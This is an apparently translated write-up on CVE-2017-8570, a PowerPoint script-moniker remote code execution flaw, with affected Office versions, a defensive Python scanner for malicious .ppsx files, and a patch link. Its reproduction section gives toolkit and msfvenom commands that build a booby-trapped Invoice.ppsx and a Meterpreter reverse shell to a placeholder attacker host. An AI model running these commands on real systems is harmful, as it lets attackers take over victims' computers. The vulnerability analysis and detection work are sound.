In July 2017, Microsoft fixed multiple Microsoft Office vulnerabilities, including CVE-2017-8570, a logic vulnerability that is simple and easy to trigger and that allows remote code execution in Microsoft Office.
The root cause is that Microsoft PowerPoint initializes a "script" Moniker object when the file is opened; the object is then activated while a PowerPoint animation plays, and the referenced SCT (Script Component) file is executed. An attacker can trick a user into opening a PowerPoint file that triggers the vulnerability and thereby obtain the same privileges as the currently logged-on user.
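As an added defender-side example (not part of the original post or of the toolkit it uses), the following Python scans a .ppsx archive for relationship targets that carry the "script:" moniker prefix or point at an .sct file, which is the trace the mechanism above leaves inside the document. It assumes the reference sits in the slide relationship (.rels) or slide XML parts of a standard OOXML zip; the sample archive and its example.invalid target are constructed for the demonstration.

```python
import io
import re
import zipfile
from typing import List, Tuple

# Relationship Targets that start with the "script:" moniker prefix, or that point
# at a .sct (Script Component) file, are the indicator described above.
SCRIPT_MONIKER_RE = re.compile(r'Target="(script:[^"]*)"', re.IGNORECASE)
SCT_RE = re.compile(r'Target="([^"]*\.sct)"', re.IGNORECASE)


def find_script_moniker_refs(ppsx_bytes: bytes) -> List[Tuple[str, str]]:
    """Return (zip member, target) pairs for every relationship or XML part that
    references a script: moniker or an .sct file. An empty list means no hit."""
    hits: List[Tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(ppsx_bytes)) as zf:
        for name in zf.namelist():
            # Only text parts (relationship files and slide XML) are worth scanning;
            # embedded binaries and media are skipped.
            if not (name.endswith(".rels") or name.endswith(".xml")):
                continue
            text = zf.read(name).decode("utf-8", errors="ignore")
            for m in SCRIPT_MONIKER_RE.finditer(text):
                hits.append((name, m.group(1)))
            for m in SCT_RE.finditer(text):
                # Avoid reporting the same script: target twice.
                if not m.group(1).lower().startswith("script:"):
                    hits.append((name, m.group(1)))
    return hits


def build_sample_ppsx(target: str) -> bytes:
    """Constructed minimal .ppsx-like archive containing one slide relationship
    file (assumed layout; real decks carry many more parts)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId2" '
        'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" '
        f'Target="{target}" TargetMode="External"/>'
        '</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("ppt/slides/_rels/slide1.xml.rels", rels)
    return buf.getvalue()
```

Run `find_script_moniker_refs(open("Invoice.ppsx", "rb").read())` against a quarantined sample; any non-empty result warrants a closer look at the slide and its animation triggers.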
Microsoft Office 2007 Service Pack 3
Microsoft Office 2010 Service Pack 2 (32-bit editions)
Microsoft Office 2010 Service Pack 2 (64-bit editions)
Microsoft Office 2013 RT Service Pack 1
Microsoft Office 2013 Service Pack 1 (32-bit editions)
Microsoft Office 2013 Service Pack 1 (64-bit editions)
Microsoft Office 2016 (32-bit edition)
Microsoft Office 2016 (64-bit edition)
0x03 Reproduction
python cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://attackerip/logo.doc
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackerip LPORT=4444 -f exe > /tmp/shell.exe
python cve-2017-8570_toolkit.py -M exp -e http://attackerip/shell.exe -l /tmp/shell.exe
set payload windows/meterpreter/reverse_tcp // set the payload
set LHOST attackerip
When the victim double-clicks Invoice.ppsx, a Meterpreter session is returned.
Get the patch from Microsoft: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8570